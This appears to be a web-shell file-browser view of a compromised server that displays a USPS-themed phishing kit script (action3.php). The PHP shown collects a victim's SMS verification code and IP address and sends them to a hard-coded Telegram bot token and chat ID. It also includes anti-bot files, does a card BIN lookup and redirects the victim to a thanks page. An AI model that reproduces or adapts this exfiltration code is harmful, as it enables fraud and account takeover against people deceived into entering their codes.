HEX
Server: LiteSpeed
System: Linux venus 5.15.0-160-generic #170-Ubuntu SMP Wed Oct 1 10:06:56 UTC 2025 x86_64
User: axxoncom (1007)
PHP: 8.3.19
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Upload Files
File: /home/axxoncom/public_html/ap/action3.php
<?php
include "anti/anti1.php";
include "anti/anti2.php"; 
include "anti/anti3.php"; 
include "anti/anti4.php"; 
include "anti/anti5.php"; 
include "anti/anti6.php"; 
include "anti/anti7.php"; 
include "anti/anti8.php"; 
include "id.php";
if(isset($_POST['okbba'])){
$ip = getenv("REMOTE_ADDR");
$bin        = str_replace(' ', '', $_POST['ccnumb']);
$bin        = substr($bin, 0, 6);
$getdetails = 'https://lookup.binlist.net/' . $bin;

$message = "-------------------- code verif------------------\nSMS Code  : ".$_POST['sms']."\nIP      : ".$ip."\n-------------------- <3 USPS <3-------------------\n";
      
        $apiToken = "7151616173:AAF8dxMtekbZU9glo4h7cKSDEO7iP-mD6mE";
        $data = [
            'chat_id' => '5214868552', 
            'text' => $message,

        ];
        $response = file_get_contents("https://api.telegram.org/bot$apiToken/sendMessage?" . http_build_query($data) );   
        HEADER("Location: thanks.php");
 
    }
?>